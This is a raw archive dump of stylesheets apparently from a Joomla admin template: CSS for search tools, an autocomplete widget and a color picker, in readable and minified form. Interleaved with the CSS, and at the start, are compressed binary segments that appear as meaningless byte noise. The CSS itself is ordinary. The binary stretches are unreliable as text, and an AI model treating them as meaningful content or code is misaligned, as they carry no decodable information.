z��<�2k�EC�74�L-�-ή0����x��S��7�0�>TW�3;��v�_��-��"m/�e�p���;X�ԑ�Ss'h^M�3��B&o�Dc���xi!bM��G�:�C���ւM���N�q�>)!�6�ɛ�����8��L��aP��_=
O�.w��h�u~��z����{��1~�=/ů=����?ϗ��O��d��ܩ����#5"K$���u�D��O���ܮ������8�%��g�Q���-n�Ӛ�m�Aˊ>��o��A�`6����8%�$�`�&$z��^���>���AE*�"�He��
��$d�
IU�~�iD��ڎ�9���)�J���2����i)�`KQN$��
��eK���	�A�!H���D��t����ڥ����M��`~���L�t�0�(�>6r?y,�ec���=�z��i��Q���II��n�[�crA'���ȝj��!q~�z���#��vkNؼ/��ǽ3�p�
[V5�����7_��:���DTXY9����Mþ3]r���el�$���ӈ�j$��L}�-L�N��h�U.ͨ��>G��<\;��4z���f����&J90��hT1x���O��p,?�ɡ��$�8a
E�lύ�y���\��꥽	?��ވ�y��xj�F�(l�{C�?�p�'��?��Ё�(�|�C)��X��L5(Y�̛7�>��$�XtPr��Ɉmڗѱ�qQ�F�]Lv+5R6�ܯ�j#�����8�|������Ю�6څKh���Tۅ�ZO�"�Q/��R	4�$0M�D�]$���d~c�/�������o�������i�=�?��[�a0t�9d�z1S��܀~j��ѝτ7t��P���C�3����~�v;�?���Q��,&Td�sQL<��^�_U��Rԩ�@���"|6�}��?�`訩��E� ��7	�ڃ)t6jT��:�4�q� ��C��\F(��Yd5��a��=3]��oE���V:M��?��z��I�����F%�����>f‘�G�T�����K�gxp���L࿬=[��պ `=w�"q6��&
A��}��|�ނM��o
~{�>nvR�rx�W�,7���Y�$�%R��v�ݝ�J��+��I����,E��L�mΖ���'C��7�u��xh[��.+n�
�`w����u��n��&Z�z�t��z���K�)�~u�)#X�e��?�2��L�-k&v̩{��MC�c�\������3+�>=l��~�dT�0Y�s���_w���$�[on_�W�=D@�
�F_{�ةC�r�'��$�O2�b�<VHO�4��A0ěh=����$�_������+��v�~��h՞}#�r|�X�8�>��j�_�=跪�w��{Y=���3�%��Z��d:�1�k��I-A�����Ne���8�ƍ���U"����v�֪oYO�8�D�W{���IO�3J�
��za��q~,��r>��h�#�w��q�!��F�٨�L�g����rJ�w��B�����u�0�Cp�a$�!�-� l�+lF8U1�9%�d�AV�+�!�f1#]F�څ����I:�I;,��}.t�.t)��$ m�'�uz3�3
I��5}�X��bF�P��,�c�E�h�U����͌��L���#��H$ l�#lFU1�9��d�AV�#���x��P�I`��xq"޿B�P&���!.�wp�sI��5ya��y�.
9K�,d��&F������w�q��&��0d�9��w~cd�`�(H+Y��oN��H�����5%M����%Q��L�����s���M�P������̟���D-��ӌ��t�&݀bQ����ȹ=���i	�|x��`��QT~�S�qBPz����h!�	�/Y	�O�&��0��ڞ����Ә�� *2�Uu%�!�g�RP@�.8(z��/~��o�6�o^�]a/��������[��sN��h��1�^i��/�~Q���v���ڻ?o�n��8����YPb|�D�`{x��v���k�b�,zxk�I�&��b����ח|&��&9���칖���ȝB��Μ��u���PK!P-��^^2atum/css/system/searchtools/searchtools.min.css.gznu&1i���R�j1��Ժ�BA�$��5�K�dOO�or�����C_�;3dvg���{���ڊ�[���Y.���w$��R���@K��4�'�[����(����D��h��c�M�C��R��<�»&�ѧ��:{�N=G���.�{�NVϒ��Æ�u;�g;��;��
*��ɣž�q*Q�� ���J%Y�a?�������ƕ�bAw������C~4�>��W��$8�h��+�F�\�L���W+�_S���(h�����2��t�I1[�u��x-�JN���?;z�Z�M�
���6���~�Շ�\�_�)��}��x�+�PK!x�+��/atum/css/system/searchtools/searchtools.min.cssnu&1i�.js-stools{display:flex;flex-wrap:wrap}.js-stools-container-bar,.js-stools-container-filters{margin-bottom:10px}.js-stools-container-bar{-webkit-margin-start:auto;margin-inline-start:auto}.js-stools-container-bar .btn-toolbar{justify-content:flex-end}.js-stools-container-bar .btn-toolbar>*{margin:5px 0}.js-stools-container-bar .btn-toolbar>*+*{-webkit-margin-start:8px;margin-inline-start:8px}.js-stools-container-bar .btn-toolbar .js-stools-btn-clear{background-color:var(--template-bg-dark);border:0}.js-stools-container-bar .ordering-select{display:flex}.js-stools-container-filters{display:none;width:100%}.js-stools-container-filters-visible{display:grid;grid-gap:8px;grid-template-columns:repeat(auto-fill,minmax(220px,1fr));padding:10px;background-color:#fff}.js-stools-field-list+.js-stools-field-list{-webkit-margin-start:8px;margin-inline-start:8px}.js-stools-container-selector{margin:5px 0;-webkit-margin-end:8px;margin-inline-end:8px}PK!��tt+atum/css/system/searchtools/searchtools.cssnu&1i�.js-stools {
  display: flex;
  flex-wrap: wrap;
}

.js-stools-container-bar,
.js-stools-container-filters {
  margin-bottom: 10px;
}

.js-stools-container-bar {
  -webkit-margin-start: auto;
          margin-inline-start: auto;
}
.js-stools-container-bar .btn-toolbar {
  justify-content: flex-end;
}
.js-stools-container-bar .btn-toolbar > * {
  margin: 5px 0;
}
.js-stools-container-bar .btn-toolbar > * + * {
  -webkit-margin-start: 8px;
          margin-inline-start: 8px;
}
.js-stools-container-bar .btn-toolbar .js-stools-btn-clear {
  background-color: var(--template-bg-dark);
  border: 0;
}
.js-stools-container-bar .ordering-select {
  display: flex;
}

.js-stools-container-filters {
  display: none;
  width: 100%;
}
.js-stools-container-filters-visible {
  display: grid;
  grid-gap: 8px;
  grid-template-columns: repeat(auto-fill, minmax(220px, 1fr));
  padding: 10px;
  background-color: #fff;
}

.js-stools-field-list + .js-stools-field-list {
  -webkit-margin-start: 8px;
          margin-inline-start: 8px;
}

.js-stools-container-selector {
  margin: 5px 0;
  -webkit-margin-end: 8px;
          margin-inline-end: 8px;
}PK!�5�%xx2atum/css/vendor/awesomplete/awesomplete.min.css.gznu&1i��}T�n� |�U�X2�i����ޣ�l�*,�MҨ�~؉��N�����T���Q�!z�PJ�g��Q�Ĵ��M�C�'�V(u"��scz4����z�†Y�*M�_<����V��d��{~������q�7�M�o�}�8�UL������pdk^�&��b�4}�9�_�K�+����:O�?)�獐�Iy-l�:,2��KkZ-�cQS*�Ɵ��b�Z�
��ct�O����hT�rJtr>%��O;�%eگ��2㽩#�e哎c2�x�FO���c$C�2ױ�M|��Mw�Vύ���}�s�=���ǵMc�w��[�]al�\.��8>O��c.��m�9�����6�H�.Y�m���=zrC%&tt�Aň�����K&���`��?��Ϫ�z�[#����`Œ���A8���� ��97ڇ���>��7
����}����n�a1X�n��ļ�	PW`�������(�5^xXmw�{F�����gw��go�`8�����A���*�	�|�T�*7��ܨ�����Bڻ�(��)���m�c��/�@��<
wu?�Q�J�n���z�Dj��e���uj�/����S�PK!��S��/atum/css/vendor/awesomplete/awesomplete.min.cssnu&1i�.awesomplete [hidden]{display:none}.awesomplete .visually-hidden{position:absolute;clip:rect(0,0,0,0)}.awesomplete{display:inline-block;position:relative}.awesomplete>input{display:block}.awesomplete>ul{position:absolute;left:0;z-index:1;min-width:100%;box-sizing:border-box;list-style:none;padding:0;margin:0;background:#fff}.awesomplete>ul:empty{display:none}.awesomplete>ul{border-radius:.3em;margin:.2em 0 0;background:hsla(0,0%,100%,.9);background:linear-gradient(to bottom right,#fff,hsla(0,0%,100%,.8));border:1px solid rgba(0,0,0,.3);box-shadow:.05em .2em .6em rgba(0,0,0,.2);text-shadow:none}@supports (transform:scale(0)){.awesomplete>ul{transition:.3s cubic-bezier(.4,.2,.5,1.4);-webkit-transform-origin:1.43em -.43em;transform-origin:1.43em -.43em}.awesomplete>ul:empty,.awesomplete>ul[hidden]{opacity:0;-webkit-transform:scale(0);transform:scale(0);display:block;transition-timing-function:ease}}.awesomplete>ul:before{content:"";position:absolute;top:-.43em;left:1em;width:0;height:0;padding:.4em;background:#fff;border:inherit;border-right:0;border-bottom:0;-webkit-transform:rotate(45deg);transform:rotate(45deg)}.awesomplete>ul>li{position:relative;padding:.2em .5em;cursor:pointer}.awesomplete>ul>li:hover{background:#b8d3e0;color:#000}.awesomplete>ul>li[aria-selected=true]{background:#3d6d8f;color:#fff}.awesomplete mark{background:#eaff00}.awesomplete li:hover mark{background:#b5d100}.awesomplete li[aria-selected=true] mark{background:#3d6b00;color:inherit}.awesomplete{display:block}PK!B�h|��+atum/css/vendor/awesomplete/awesomplete.cssnu&1i�.awesomplete [hidden] {
  display: none;
}

.awesomplete .visually-hidden {
  position: absolute;
  clip: rect(0, 0, 0, 0);
}

.awesomplete {
  display: inline-block;
  position: relative;
}

.awesomplete > input {
  display: block;
}

.awesomplete > ul {
  position: absolute;
  left: 0;
  z-index: 1;
  min-width: 100%;
  box-sizing: border-box;
  list-style: none;
  padding: 0;
  margin: 0;
  background: #fff;
}

.awesomplete > ul:empty {
  display: none;
}

.awesomplete > ul {
  border-radius: 0.3em;
  margin: 0.2em 0 0;
  background: hsla(0, 0%, 100%, 0.9);
  background: linear-gradient(to bottom right, white, hsla(0, 0%, 100%, 0.8));
  border: 1px solid rgba(0, 0, 0, 0.3);
  box-shadow: 0.05em 0.2em 0.6em rgba(0, 0, 0, 0.2);
  text-shadow: none;
}

@supports (transform: scale(0)) {
  .awesomplete > ul {
    transition: 0.3s cubic-bezier(0.4, 0.2, 0.5, 1.4);
    -webkit-transform-origin: 1.43em -0.43em;
            transform-origin: 1.43em -0.43em;
  }

  .awesomplete > ul[hidden],
.awesomplete > ul:empty {
    opacity: 0;
    -webkit-transform: scale(0);
            transform: scale(0);
    display: block;
    transition-timing-function: ease;
  }
}
/* Pointer */
.awesomplete > ul:before {
  content: "";
  position: absolute;
  top: -0.43em;
  left: 1em;
  width: 0;
  height: 0;
  padding: 0.4em;
  background: white;
  border: inherit;
  border-right: 0;
  border-bottom: 0;
  -webkit-transform: rotate(45deg);
  transform: rotate(45deg);
}

.awesomplete > ul > li {
  position: relative;
  padding: 0.2em 0.5em;
  cursor: pointer;
}

.awesomplete > ul > li:hover {
  background: hsl(200, 40%, 80%);
  color: black;
}

.awesomplete > ul > li[aria-selected=true] {
  background: hsl(205, 40%, 40%);
  color: white;
}

.awesomplete mark {
  background: hsl(65, 100%, 50%);
}

.awesomplete li:hover mark {
  background: hsl(68, 100%, 41%);
}

.awesomplete li[aria-selected=true] mark {
  background: hsl(86, 100%, 21%);
  color: inherit;
}
.awesomplete {
  display: block;
}PK!S֯S�'�')atum/css/vendor/minicolors/minicolors.cssnu&1i�.minicolors {
  position: relative;
}

.minicolors-sprite {
  background-image: url(jquery.minicolors.png);
}

.minicolors-swatch {
  position: absolute;
  vertical-align: middle;
  background-position: -80px 0;
  border: solid 1px #ccc;
  cursor: text;
  padding: 0;
  margin: 0;
  display: inline-block;
}

.minicolors-swatch-color {
  position: absolute;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
}

.minicolors input[type=hidden] + .minicolors-swatch {
  width: 28px;
  position: static;
  cursor: pointer;
}

.minicolors input[type=hidden][disabled] + .minicolors-swatch {
  cursor: default;
}

/* Panel */
.minicolors-panel {
  position: absolute;
  width: 173px;
  background: white;
  border: solid 1px #CCC;
  box-shadow: 0 0 20px rgba(0, 0, 0, 0.2);
  z-index: 99999;
  box-sizing: content-box;
  display: none;
}

.minicolors-panel.minicolors-visible {
  display: block;
}

/* Panel positioning */
.minicolors-position-top .minicolors-panel {
  top: -154px;
}

.minicolors-position-right .minicolors-panel {
  right: 0;
}

.minicolors-position-bottom .minicolors-panel {
  top: auto;
}

.minicolors-position-left .minicolors-panel {
  left: 0;
}

.minicolors-with-opacity .minicolors-panel {
  width: 194px;
}

.minicolors .minicolors-grid {
  position: relative;
  top: 1px;
  left: 1px;
  /* LTR */
  width: 150px;
  height: 150px;
  margin-bottom: 2px;
  background-position: -120px 0;
  cursor: crosshair;
}

[dir=rtl] .minicolors .minicolors-grid {
  right: 1px;
}

.minicolors .minicolors-grid-inner {
  position: absolute;
  top: 0;
  left: 0;
  width: 150px;
  height: 150px;
}

.minicolors-slider-saturation .minicolors-grid {
  background-position: -420px 0;
}

.minicolors-slider-saturation .minicolors-grid-inner {
  background-position: -270px 0;
  background-image: inherit;
}

.minicolors-slider-brightness .minicolors-grid {
  background-position: -570px 0;
}

.minicolors-slider-brightness .minicolors-grid-inner {
  background-color: black;
}

.minicolors-slider-wheel .minicolors-grid {
  background-position: -720px 0;
}

.minicolors-slider,
.minicolors-opacity-slider {
  position: absolute;
  top: 1px;
  left: 152px;
  /* LTR */
  width: 20px;
  height: 150px;
  background-color: white;
  background-position: 0 0;
  cursor: row-resize;
}

[dir=rtl] .minicolors-slider,
[dir=rtl] .minicolors-opacity-slider {
  right: 152px;
}

.minicolors-slider-saturation .minicolors-slider {
  background-position: -60px 0;
}

.minicolors-slider-brightness .minicolors-slider {
  background-position: -20px 0;
}

.minicolors-slider-wheel .minicolors-slider {
  background-position: -20px 0;
}

.minicolors-opacity-slider {
  left: 173px;
  /* LTR */
  background-position: -40px 0;
  display: none;
}

[dir=rtl] .minicolors-opacity-slider {
  right: 173px;
}

.minicolors-with-opacity .minicolors-opacity-slider {
  display: block;
}

/* Pickers */
.minicolors-grid .minicolors-picker {
  position: absolute;
  top: 70px;
  left: 70px;
  width: 12px;
  height: 12px;
  border: solid 1px black;
  border-radius: 10px;
  margin-top: -6px;
  margin-left: -6px;
  background: none;
}

.minicolors-grid .minicolors-picker > div {
  position: absolute;
  top: 0;
  left: 0;
  width: 8px;
  height: 8px;
  border-radius: 8px;
  border: solid 2px white;
  box-sizing: content-box;
}

.minicolors-picker {
  position: absolute;
  top: 0;
  left: 0;
  width: 18px;
  height: 2px;
  background: white;
  border: solid 1px black;
  margin-top: -2px;
  box-sizing: content-box;
}

/* Swatches */
.minicolors-swatches,
.minicolors-swatches li {
  margin: 5px 0 3px 5px;
  /* LTR */
  padding: 0;
  list-style: none;
  overflow: hidden;
}

[dir=rtl] .minicolors-swatches,
[dir=rtl] .minicolors-swatches li {
  margin: 5px 5px 3px 0;
}

.minicolors-swatches .minicolors-swatch {
  position: relative;
  float: left;
  /* LTR */
  cursor: pointer;
  margin: 0 4px 0 0;
  /* LTR */
}

[dir=rtl] .minicolors-swatches .minicolors-swatch {
  float: right;
  margin: 0 0 0 4px;
}

.minicolors-with-opacity .minicolors-swatches .minicolors-swatch {
  margin-right: 7px;
  /* LTR */
}

[dir=rtl] .minicolors-with-opacity .minicolors-swatches .minicolors-swatch {
  margin-right: 0;
  margin-left: 7px;
}

.minicolors-swatch.selected {
  border-color: #000;
}

/* Inline controls */
.minicolors-inline {
  display: inline-block;
}

.minicolors-inline .minicolors-input {
  display: none !important;
}

.minicolors-inline .minicolors-panel {
  position: relative;
  top: auto;
  left: auto;
  /* LTR */
  box-shadow: none;
  z-index: auto;
  display: inline-block;
}

[dir=rtl] .minicolors-inline .minicolors-panel {
  right: auto;
}

/* Default theme */
.minicolors-theme-default .minicolors-swatch {
  top: 5px;
  left: 5px;
  /* LTR */
  width: 18px;
  height: 18px;
}

[dir=rtl] .minicolors-theme-default .minicolors-swatch {
  right: 5px;
}

.minicolors-theme-default .minicolors-swatches .minicolors-swatch {
  margin-bottom: 2px;
  top: 0;
  left: 0;
  /* LTR */
  width: 18px;
  height: 18px;
}

[dir=rtl] .minicolors-theme-default .minicolors-swatches .minicolors-swatch {
  right: 0;
}

.minicolors-theme-default.minicolors-position-right .minicolors-swatch {
  left: auto;
  /* LTR */
  right: 5px;
  /* LTR */
}

[dir=rtl] .minicolors-theme-default.minicolors-position-left .minicolors-swatch {
  right: auto;
  left: 5px;
}

.minicolors-theme-default.minicolors {
  width: auto;
  display: inline-block;
}

.minicolors-theme-default .minicolors-input {
  height: 20px;
  width: auto;
  display: inline-block;
  padding-left: 26px;
  /* LTR */
}

[dir=rtl] .minicolors-theme-default .minicolors-input {
  text-align: right;
  unicode-bidi: -moz-plaintext;
  unicode-bidi: plaintext;
  padding-left: 1px;
  padding-right: 26px;
}

.minicolors-theme-default.minicolors-position-right .minicolors-input {
  padding-right: 26px;
  /* LTR */
  padding-left: inherit;
  /* LTR */
}

[dir=rtl] .minicolors-theme-default.minicolors-position-left .minicolors-input {
  padding-right: inherit;
  padding-left: 26px;
}

/* Bootstrap theme */
.minicolors-theme-bootstrap .minicolors-swatch {
  z-index: 2;
  top: 3px;
  left: 3px;
  /* LTR */
  width: 28px;
  height: 28px;
  border-radius: 3px;
}

[dir=rtl] .minicolors-theme-bootstrap .minicolors-swatch {
  right: 3px;
}

.minicolors-theme-bootstrap .minicolors-swatches .minicolors-swatch {
  margin-bottom: 2px;
  top: 0;
  left: 0;
  /* LTR */
  width: 20px;
  height: 20px;
}

[dir=rtl] .minicolors-theme-bootstrap .minicolors-swatches .minicolors-swatch {
  right: 0;
}

.minicolors-theme-bootstrap .minicolors-swatch-color {
  border-radius: inherit;
}

.minicolors-theme-bootstrap.minicolors-position-right > .minicolors-swatch {
  left: auto;
  /* LTR */
  right: 3px;
  /* LTR */
}

[dir=rtl] .minicolors-theme-bootstrap.minicolors-position-left > .minicolors-swatch {
  right: auto;
  left: 3px;
}

.minicolors-theme-bootstrap .minicolors-input {
  float: none;
  padding-left: 44px;
  /* LTR */
}

[dir=rtl] .minicolors-theme-bootstrap .minicolors-input {
  text-align: right;
  unicode-bidi: -moz-plaintext;
  unicode-bidi: plaintext;
  padding-left: 12px;
  padding-right: 44px;
}

.minicolors-theme-bootstrap.minicolors-position-right .minicolors-input {
  padding-right: 44px;
  /* LTR */
  padding-left: 12px;
  /* LTR */
}

[dir=rtl] .minicolors-theme-bootstrap.minicolors-position-left .minicolors-input {
  padding-right: 12px;
  padding-left: 44px;
}

.minicolors-theme-bootstrap .minicolors-input.input-lg + .minicolors-swatch {
  top: 4px;
  left: 4px;
  /* LTR */
  width: 37px;
  height: 37px;
  border-radius: 5px;
}

[dir=rtl] .minicolors-theme-bootstrap .minicolors-input.input-lg + .minicolors-swatch {
  right: 4px;
}

.minicolors-theme-bootstrap .minicolors-input.input-sm + .minicolors-swatch {
  width: 24px;
  height: 24px;
}

.minicolors-theme-bootstrap .minicolors-input.input-xs + .minicolors-swatch {
  width: 18px;
  height: 18px;
}

.input-group .minicolors-theme-bootstrap:not(:first-child) .minicolors-input {
  border-top-left-radius: 0;
  /* LTR */
  border-bottom-left-radius: 0;
  /* LTR */
}

[dir=rtl] .input-group .minicolors-theme-bootstrap .minicolors-input {
  border-radius: 4px;
}

[dir=rtl] .input-group .minicolors-theme-bootstrap:not(:first-child) .minicolors-input {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}

[dir=rtl] .input-group .minicolors-theme-bootstrap:not(:last-child) .minicolors-input {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}

/* bootstrap input-group rtl override */
[dir=rtl] .input-group .form-control,
[dir=rtl] .input-group-addon,
[dir=rtl] .input-group-btn > .btn,
[dir=rtl] .input-group-btn > .btn-group > .btn,
[dir=rtl] .input-group-btn > .dropdown-toggle {
  border: 1px solid #ccc;
  border-radius: 4px;
}

[dir=rtl] .input-group .form-control:first-child,
[dir=rtl] .input-group-addon:first-child,
[dir=rtl] .input-group-btn:first-child > .btn,
[dir=rtl] .input-group-btn:first-child > .btn-group > .btn,
[dir=rtl] .input-group-btn:first-child > .dropdown-toggle,
[dir=rtl] .input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
[dir=rtl] .input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-left: 0;
}

[dir=rtl] .input-group .form-control:last-child,
[dir=rtl] .input-group-addon:last-child,
[dir=rtl] .input-group-btn:last-child > .btn,
[dir=rtl] .input-group-btn:last-child > .btn-group > .btn,
[dir=rtl] .input-group-btn:last-child > .dropdown-toggle,
[dir=rtl] .input-group-btn:first-child > .btn:not(:first-child),
[dir=rtl] .input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}

/* Semantic Ui theme */
.minicolors-theme-semanticui .minicolors-swatch {
  top: 0;
  left: 0;
  /* LTR */
  padding: 18px;
}

[dir=rtl] .minicolors-theme-semanticui .minicolors-swatch {
  right: 0;
}

.minicolors-theme-semanticui input {
  text-indent: 30px;
}

.minicolors-theme-bootstrap .minicolors-input {
  width: 140px;
}
.minicolors-theme-bootstrap .rgb {
  width: 175px;
}
.minicolors-theme-bootstrap .rgba {
  width: 220px;
}PK!�#�x x -atum/css/vendor/minicolors/minicolors.min.cssnu&1i�.minicolors{position:relative}.minicolors-sprite{background-image:url(jquery.minicolors.png)}.minicolors-swatch{position:absolute;vertical-align:middle;background-position:-80px 0;border:1px solid #ccc;cursor:text;padding:0;margin:0;display:inline-block}.minicolors-swatch-color{position:absolute;top:0;left:0;right:0;bottom:0}.minicolors input[type=hidden]+.minicolors-swatch{width:28px;position:static;cursor:pointer}.minicolors input[type=hidden][disabled]+.minicolors-swatch{cursor:default}.minicolors-panel{position:absolute;width:173px;background:#fff;border:1px solid #ccc;box-shadow:0 0 20px rgba(0,0,0,.2);z-index:99999;box-sizing:content-box;display:none}.minicolors-panel.minicolors-visible{display:block}.minicolors-position-top .minicolors-panel{top:-154px}.minicolors-position-right .minicolors-panel{right:0}.minicolors-position-bottom .minicolors-panel{top:auto}.minicolors-position-left .minicolors-panel{left:0}.minicolors-with-opacity .minicolors-panel{width:194px}.minicolors .minicolors-grid{position:relative;top:1px;left:1px;width:150px;height:150px;margin-bottom:2px;background-position:-120px 0;cursor:crosshair}[dir=rtl] .minicolors .minicolors-grid{right:1px}.minicolors .minicolors-grid-inner{position:absolute;top:0;left:0;width:150px;height:150px}.minicolors-slider-saturation .minicolors-grid{background-position:-420px 0}.minicolors-slider-saturation .minicolors-grid-inner{background-position:-270px 0;background-image:inherit}.minicolors-slider-brightness .minicolors-grid{background-position:-570px 0}.minicolors-slider-brightness .minicolors-grid-inner{background-color:#000}.minicolors-slider-wheel .minicolors-grid{background-position:-720px 0}.minicolors-opacity-slider,.minicolors-slider{position:absolute;top:1px;left:152px;width:20px;height:150px;background-color:#fff;background-position:0 0;cursor:row-resize}[dir=rtl] .minicolors-opacity-slider,[dir=rtl] .minicolors-slider{right:152px}.minicolors-slider-saturation .minicolors-slider{background-position:-60px 0}.minicolors-slider-brightness .minicolors-slider,.minicolors-slider-wheel .minicolors-slider{background-position:-20px 0}.minicolors-opacity-slider{left:173px;background-position:-40px 0;display:none}[dir=rtl] .minicolors-opacity-slider{right:173px}.minicolors-with-opacity .minicolors-opacity-slider{display:block}.minicolors-grid .minicolors-picker{position:absolute;top:70px;left:70px;width:12px;height:12px;border:1px solid #000;border-radius:10px;margin-top:-6px;margin-left:-6px;background:none}.minicolors-grid .minicolors-picker>div{position:absolute;top:0;left:0;width:8px;height:8px;border-radius:8px;border:2px solid #fff;box-sizing:content-box}.minicolors-picker{position:absolute;top:0;left:0;width:18px;height:2px;background:#fff;border:1px solid #000;margin-top:-2px;box-sizing:content-box}.minicolors-swatches,.minicolors-swatches li{margin:5px 0 3px 5px;padding:0;list-style:none;overflow:hidden}[dir=rtl] .minicolors-swatches,[dir=rtl] .minicolors-swatches li{margin:5px 5px 3px 0}.minicolors-swatches .minicolors-swatch{position:relative;float:left;cursor:pointer;margin:0 4px 0 0}[dir=rtl] .minicolors-swatches .minicolors-swatch{float:right;margin:0 0 0 4px}.minicolors-with-opacity .minicolors-swatches .minicolors-swatch{margin-right:7px}[dir=rtl] .minicolors-with-opacity .minicolors-swatches .minicolors-swatch{margin-right:0;margin-left:7px}.minicolors-swatch.selected{border-color:#000}.minicolors-inline{display:inline-block}.minicolors-inline .minicolors-input{display:none!important}.minicolors-inline .minicolors-panel{position:relative;top:auto;left:auto;box-shadow:none;z-index:auto;display:inline-block}[dir=rtl] .minicolors-inline .minicolors-panel{right:auto}.minicolors-theme-default .minicolors-swatch{top:5px;left:5px;width:18px;height:18px}[dir=rtl] .minicolors-theme-default .minicolors-swatch{right:5px}.minicolors-theme-default .minicolors-swatches .minicolors-swatch{margin-bottom:2px;top:0;left:0;width:18px;height:18px}[dir=rtl] .minicolors-theme-default .minicolors-swatches .minicolors-swatch{right:0}.minicolors-theme-default.minicolors-position-right .minicolors-swatch{left:auto;right:5px}[dir=rtl] .minicolors-theme-default.minicolors-position-left .minicolors-swatch{right:auto;left:5px}.minicolors-theme-default.minicolors{width:auto;display:inline-block}.minicolors-theme-default .minicolors-input{height:20px;width:auto;display:inline-block;padding-left:26px}[dir=rtl] .minicolors-theme-default .minicolors-input{text-align:right;unicode-bidi:-moz-plaintext;unicode-bidi:plaintext;padding-left:1px;padding-right:26px}.minicolors-theme-default.minicolors-position-right .minicolors-input{padding-right:26px;padding-left:inherit}[dir=rtl] .minicolors-theme-default.minicolors-position-left .minicolors-input{padding-right:inherit;padding-left:26px}.minicolors-theme-bootstrap .minicolors-swatch{z-index:2;top:3px;left:3px;width:28px;height:28px;border-radius:3px}[dir=rtl] .minicolors-theme-bootstrap .minicolors-swatch{right:3px}.minicolors-theme-bootstrap .minicolors-swatches .minicolors-swatch{margin-bottom:2px;top:0;left:0;width:20px;height:20px}[dir=rtl] .minicolors-theme-bootstrap .minicolors-swatches .minicolors-swatch{right:0}.minicolors-theme-bootstrap .minicolors-swatch-color{border-radius:inherit}.minicolors-theme-bootstrap.minicolors-position-right>.minicolors-swatch{left:auto;right:3px}[dir=rtl] .minicolors-theme-bootstrap.minicolors-position-left>.minicolors-swatch{right:auto;left:3px}.minicolors-theme-bootstrap .minicolors-input{float:none;padding-left:44px}[dir=rtl] .minicolors-theme-bootstrap .minicolors-input{text-align:right;unicode-bidi:-moz-plaintext;unicode-bidi:plaintext;padding-left:12px;padding-right:44px}.minicolors-theme-bootstrap.minicolors-position-right .minicolors-input{padding-right:44px;padding-left:12px}[dir=rtl] .minicolors-theme-bootstrap.minicolors-position-left .minicolors-input{padding-right:12px;padding-left:44px}.minicolors-theme-bootstrap .minicolors-input.input-lg+.minicolors-swatch{top:4px;left:4px;width:37px;height:37px;border-radius:5px}[dir=rtl] .minicolors-theme-bootstrap .minicolors-input.input-lg+.minicolors-swatch{right:4px}.minicolors-theme-bootstrap .minicolors-input.input-sm+.minicolors-swatch{width:24px;height:24px}.minicolors-theme-bootstrap .minicolors-input.input-xs+.minicolors-swatch{width:18px;height:18px}.input-group .minicolors-theme-bootstrap:not(:first-child) .minicolors-input{border-top-left-radius:0;border-bottom-left-radius:0}[dir=rtl] .input-group .minicolors-theme-bootstrap .minicolors-input{border-radius:4px}[dir=rtl] .input-group .minicolors-theme-bootstrap:not(:first-child) .minicolors-input{border-top-right-radius:0;border-bottom-right-radius:0}[dir=rtl] .input-group .minicolors-theme-bootstrap:not(:last-child) .minicolors-input{border-top-left-radius:0;border-bottom-left-radius:0}[dir=rtl] .input-group-addon,[dir=rtl] .input-group-btn>.btn,[dir=rtl] .input-group-btn>.btn-group>.btn,[dir=rtl] .input-group-btn>.dropdown-toggle,[dir=rtl] .input-group .form-control{border:1px solid #ccc;border-radius:4px}[dir=rtl] .input-group-addon:first-child,[dir=rtl] .input-group-btn:first-child>.btn,[dir=rtl] .input-group-btn:first-child>.btn-group>.btn,[dir=rtl] .input-group-btn:first-child>.dropdown-toggle,[dir=rtl] .input-group-btn:last-child>.btn-group:not(:last-child)>.btn,[dir=rtl] .input-group-btn:last-child>.btn:not(:last-child):not(.dropdown-toggle),[dir=rtl] .input-group .form-control:first-child{border-top-left-radius:0;border-bottom-left-radius:0;border-left:0}[dir=rtl] .input-group-addon:last-child,[dir=rtl] .input-group-btn:first-child>.btn-group:not(:first-child)>.btn,[dir=rtl] .input-group-btn:first-child>.btn:not(:first-child),[dir=rtl] .input-group-btn:last-child>.btn,[dir=rtl] .input-group-btn:last-child>.btn-group>.btn,[dir=rtl] .input-group-btn:last-child>.dropdown-toggle,[dir=rtl] .input-group .form-control:last-child{border-top-right-radius:0;border-bottom-right-radius:0}.minicolors-theme-semanticui .minicolors-swatch{top:0;left:0;padding:18px}[dir=rtl] .minicolors-theme-semanticui .minicolors-swatch{right:0}.minicolors-theme-semanticui input{text-indent:30px}.minicolors-theme-bootstrap .minicolors-input{width:140px}.minicolors-theme-bootstrap .rgb{width:175px}.minicolors-theme-bootstrap .rgba{width:220px}PK!Vbm�0atum/css/vendor/minicolors/minicolors.min.css.gznu&1i���Yms�8�+��f<�q���#�~�Aƺ�'�ĩ����$��\/�$����>�Z���QLYu+i�8�$e�^��e�U%C� �Y0z!y�Π�����s���zzY��+�xvjm�CE��+deG���g���-3�H���E�?P�C�����OY���(K9��}	��"��g�
D�E�������f?=#����Rh��������{���sۊ��������I8ɏ/�@�����乼�cao<))"��߅c�a�bT��.�w�-����ڭ�6������^��r��Ƌx��,��>Ǐ�{�<�E���~�_Z��ʨ��H�jRD(�.T��+���VK�٬��D���2��j�)�~)�`��I�_H�!`
\8��INy�4�:"o��"Z��w����מW�'�r���EV5��ѵ�ܟ��Z�e|M�I�R]%�V
3F+A�~��o���A�:ЫO��֐/��t�,��0 �����n��3u�^��δ�~�E�E��:�xXUaowA��\�j1��^Uo'�DD;O 
׍�G�B �-��IC����jrtqKeF�"E��~.�A�2�
�%�2��0>��k0���
M��h���.%��60%�u��i��'�F$]��e?���5�y��L�I,ک~�l��z�݈�]�te�Z�W=���u�ڞ�=3��%G���s��A]�k��-��C���������#�4��`ڑ�!�&X=�n.0��Ir+9�L[l����U<��;�*{*��##���Dn�/��˟�[��Ccw��l��2ֽy���j<�gN+We٪�ߛ�:��dWW�Nh����Sr��ǘe1�8����������c�^Xto���f�ſй����d{S~g�#��6ue��̮���q��Aua~�g�#�/'��۶�Z�A^�װ��쎉
